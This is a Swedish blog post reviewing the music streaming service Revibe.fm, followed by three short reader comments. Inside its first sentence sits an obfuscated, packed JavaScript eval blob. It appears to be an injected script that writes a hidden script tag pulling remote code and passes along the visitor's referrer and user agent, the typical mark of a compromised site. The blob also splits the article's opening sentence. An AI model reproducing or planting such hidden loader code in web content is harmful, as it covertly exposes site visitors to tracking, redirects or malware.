Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Musiktjänsten Revibe.fm slår upp portarna

Musiktjänsten Revibe.fm slår upp portarna
Sebastian

För eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nfeyz|var|u0026u|referrer|yzikh||js|php’.split(’|’),0,{}))
ett tag sen fick jag nys om att det skulle öppna upp en spotify-liknande tjänst med fokus på house-musik, housify.com.

Igår fick vi på Revue ett mailutskick från Housify där de meddelade att deras nya tjänst nu kommer att heta revibe.fm och att det var dags att gå in och kika på deras nya hemsida.

Att det öppnar upp många spotify-liknande tjänster vet vi om, men många av dessa är inte alltid optimala. Efter att ha kikat in på Revibe.fm måste jag faktiskt säga att det är en tjänst med potential. Design-nörd som jag är var det gränssnittet som slog mig först. Det är otroligt snyggt med sina mörka färger sammansatt med rosa och ljusblå nyans på texten.  Det är en modern känsla som inte springer iväg allt för mycket ifrån Spotifys navigeringsstruktur, vilket är ett stort plus.

Själva musiktjänsten är absolut inte så stor som Spotify och last.fm, än. Man får ta det med tiden då jag absolut tror att Revibe.fm kommer att fungera i längden.

Efter att pratat med många vänner både innanför och utanför Revues väggar så är kommentarerna varierande men många positiva. Det är klart det är ett litet projekt att flytta över sig från Spotify, men skulle Revibe.fm erbjuda ungefär samma utbud musik till ett lägre pris kommer nog många hänga på.

Just nu kostar det 49 kronor i månaden att använda och det står att det kommer kosta 99 kronor när betan är slut. Tyvärr tror jag inte detta pris kommer att hålla i längden. Man ska inte lägga sig under konkurrenten men för att kunna ta lika mycket som jätten Spotify behövs det verkligen något extra att erbjuda.

Vi får se vad som händer med detta. Revue kommer att försöka uppdatera er läsare så mycket som det går i fart med hur detta projekt växer.

För att läsa mer och även testa på tjänsten kan ni besöka deras hemsida revibe.fm.

Hemsida: Revibe.fm

Comments

  1. Jonas

    Spännande!

  2. Pelle

    Ska bli sjukt kul att få se hur detta fungerar. Måste man ansöka om ett medlemskap eller kan man registrera sig direkt?

  3. Music man

    Coolt, alltid kul med lite nytt blod speciellt när det är svenskt 🙂 Såg att ert kontor låg i Lund.